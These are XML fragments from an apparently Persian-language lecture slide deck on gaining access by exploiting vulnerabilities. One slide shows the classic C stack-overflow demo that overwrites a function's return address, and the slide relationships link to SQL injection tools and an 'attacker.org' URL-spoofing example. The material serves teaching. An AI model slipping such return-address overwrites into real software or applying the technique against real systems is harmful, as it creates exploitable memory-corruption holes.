          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr marL="2057400" indent="-228600" algn="r" rtl="1" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="2971800" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="3429000" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="1400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="3886200" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buChar char="»"/>
        <a:defRPr sz="14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coobygang.org/magicsql/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://sqlninja.sourceforge.net/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://securitytube.net/"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google.com/url?sa=t&amp;rct=j&amp;q=&amp;esrc=s&amp;source=web&amp;cd=1&amp;cad=rja&amp;ved=0CDEQFjAA&amp;url=http://en.wikipedia.org/wiki/Promiscuous_mode&amp;ei=0Z9fUfj5CIOYtAb6jIGIAw&amp;usg=AFQjCNHXE5LG_WRpOtvaWJ7rPhky5lL1Ww&amp;sig2=SKJlZTTJuUx3iWItYEughw&amp;bvm=bv.44770516,d.Yms"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web.archive.org/web/20050221103207/"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5.wmf"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="../embeddings/oleObject1.bin"/></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15.w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http://home.netscape.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.attacker.org/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.attacker.org/http:/home.netscape.com" TargetMode="Externa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3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2286000" y="1981200"/>
            <a:ext cx="6477000" cy="2057400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="139700">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="20000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>هجوم به قصد دسترسي</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fa-IR" sz="3600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="139700">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="20000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="139700">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="20000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>( از طريق سوء استفاده از آسيب پذيري ها)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="139700">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="20000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fa-IR" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="139700">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="20000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fa-IR" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="139700">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="20000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="fa-IR" sz="4400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FFFF00"/>
                </a:solidFill>
                <a:effectLst>
                  <a:glow rad="139700">
                    <a:schemeClr val="accent5">
                      <a:satMod val="175000"/>
                      <a:alpha val="40000"/>
                    </a:schemeClr>
                  </a:glow>
                  <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                    <a:prstClr val="black">
                      <a:alpha val="20000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="4400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="FFFF00"/>
              </a:solidFill>
              <a:effectLst>
                <a:glow rad="139700">
                  <a:schemeClr val="accent5">
                    <a:satMod val="175000"/>
                    <a:alpha val="40000"/>
                  </a:schemeClr>
                </a:glow>
                <a:outerShdw blurRad="60007" dir="2000400" sy="-30000" kx="-800400" algn="bl" rotWithShape="0">
                  <a:prstClr val="black">
                    <a:alpha val="20000"/>
                  </a:prstClr>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:overrideClrMapping bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
  </p:clrMapOvr>
  <p:transition advTm="765">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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>مثال سوم</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Text Box 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1428690"/>
            <a:ext cx="7523213" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" rtl="1"/>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آيا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ما </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ميتوانيم</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>جاي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>crash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> برنامه، از </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اين ويژگي براي اجراي </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کد خود استفاده </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>کنيم</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="2000">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Nazanin" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Text Box 4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="2057400"/>
            <a:ext cx="4191000" cy="4359275"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>void function(int a, int b, int c){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	char buffer1[5];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	char buffer2[10];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	int *r;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	r = buffer1 + 12;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	(*r) += 8;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>int main(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	int x = 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	function(1,2,3);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	x = 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>	printf(“%d\n”, x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6"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10</a:t>
            </a:fld>
            <a:endParaRPr lang="fa-I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a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" smtClean="0"/>
              <a:t>مثال سوم</a:t>
            </a:r>
            <a:endParaRPr smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 30"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="2514600"/>
            <a:ext cx="9144000" cy="2517775"/>
            <a:chOff x="0" y="1584"/>
            <a:chExt cx="5760" cy="1586"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19465" name="Text Box 4"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="1872"/>
              <a:ext cx="180" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19466" name="Rectangle 5"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4032" y="2064"/>
              <a:ext cx="384" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19467" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4512" y="1872"/>
              <a:ext cx="180" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19468" name="Rectangle 7"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4416" y="2064"/>
              <a:ext cx="384" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19469" name="Text Box 8"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4896" y="1872"/>
              <a:ext cx="180" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19470" name="Rectangle 9"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4800" y="2064"/>
              <a:ext cx="384" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19471" name="Text Box 10"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4896" y="2448"/>
              <a:ext cx="201" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>c</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19472" name="Text Box 11"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4512" y="2448"/>
              <a:ext cx="212" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>b</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19473" name="Text Box 12"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4128" y="2448"/>
              <a:ext cx="201" cy="288"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US"/>
                <a:t>a</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19474" name="Text Box 13"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3744" y="1872"/>
              <a:ext cx="180" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19475" name="Rectangle 14"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3648" y="2064"/>
              <a:ext cx="384" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fa-IR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19476" name="Text Box 15"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3360" y="1872"/>
              <a:ext cx="180" cy="212"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1600"/>
                <a:t>4</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19477" name="Rectangle 16"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="2064"/>
              <a:ext cx="384" cy="384"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
